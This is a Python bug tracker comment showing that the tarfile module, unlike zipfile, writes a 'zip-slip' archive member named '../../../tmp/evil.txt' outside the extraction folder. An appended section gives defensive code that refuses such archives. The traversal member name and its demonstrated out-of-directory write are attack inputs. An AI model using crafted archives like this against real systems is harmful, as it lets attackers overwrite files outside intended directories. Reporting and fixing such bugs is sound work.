Christian Heimes <li...@cheimes.de> added the comment:
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.

$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip

Test zipfile:

$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name                                             Modified             Size
good.txt                                       2018-04-15 22:04:30           19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42           20
>>> zf.extractall()
>>> exit()
$ find .
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip

Test tarfile:

$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff         19 2018-04-15 19:04:29 good.txt
?rw-r--r-- grander/staff         20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
>>> tf.extractall()
# find .
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt
this is an evil one

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue35909>
_______________________________________
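A defensive check for the tarfile case shown in the comment, added here as an illustration; it is not part of Christian Heimes's message and not CPython's own code. Instead of downloading the snyk test archive, it builds a constructed in-memory tar with a benign member and a member named `../../../../../../tmp/evil.txt`, then resolves every member name (and, for links, the link target) against the destination directory before calling `extractall()`, refusing the whole archive if any member would land outside it. The names `build_demo_tar`, `is_within`, `unsafe_members`, `safe_extractall` and `run_demo` are this example's own.

```python
import io
import os
import tarfile
import tempfile


def build_demo_tar(include_evil):
    """Build a constructed sample archive in memory (not the snyk test file).

    It always contains a benign member; with include_evil=True it also
    contains a member whose name climbs out of the extraction directory,
    mirroring the '../../../tmp/evil.txt' entry shown in the comment.
    """
    members = [("good.txt", b"this is a good one\n")]
    if include_evil:
        members.append(("../../../../../../tmp/evil.txt", b"this is an evil one\n"))
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in members:
            info = tarfile.TarInfo(name=name)  # tarfile stores the name as given
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def is_within(base, target):
    """True if target, after resolving '..' and symlinks, stays under base."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def unsafe_members(tf, dest):
    """Return the names of members that would write outside dest.

    Checks absolute names, '..' traversal and, for hard/symlinks, the link
    target, so a link pointing outside dest is rejected as well.
    """
    bad = []
    for m in tf.getmembers():
        if os.path.isabs(m.name) or not is_within(dest, os.path.join(dest, m.name)):
            bad.append(m.name)
            continue
        if m.issym() or m.islnk():
            link_target = os.path.join(dest, os.path.dirname(m.name), m.linkname)
            if os.path.isabs(m.linkname) or not is_within(dest, link_target):
                bad.append(m.name)
    return bad


def safe_extractall(tar_bytes, dest):
    """Validate every member first; refuse the whole archive if any is unsafe."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tf:
        bad = unsafe_members(tf, dest)
        if bad:
            raise ValueError("refusing to extract, unsafe members: %r" % bad)
        tf.extractall(dest)
        return sorted(m.name for m in tf.getmembers())


def run_demo():
    """Run both constructed archives through safe_extractall in a scratch dir."""
    with tempfile.TemporaryDirectory() as dest:
        evil = build_demo_tar(include_evil=True)
        with tarfile.open(fileobj=io.BytesIO(evil), mode="r") as tf:
            rejected = unsafe_members(tf, dest)
        try:
            safe_extractall(evil, dest)
            refused = False
        except ValueError:
            refused = True
        extracted = safe_extractall(build_demo_tar(include_evil=False), dest)
        on_disk = sorted(os.listdir(dest))
    return {"rejected": rejected, "refused": refused,
            "extracted": extracted, "on_disk": on_disk}


if __name__ == "__main__":
    print(run_demo())
```

The check rejects the archive up front rather than skipping the bad member, because a partially extracted archive is usually worse than none. On Python releases that ship the extraction filters added for this problem, `extractall(dest, filter="data")` performs an equivalent traversal and link check inside tarfile itself; the explicit pre-check above is for code that must run on interpreters without that argument.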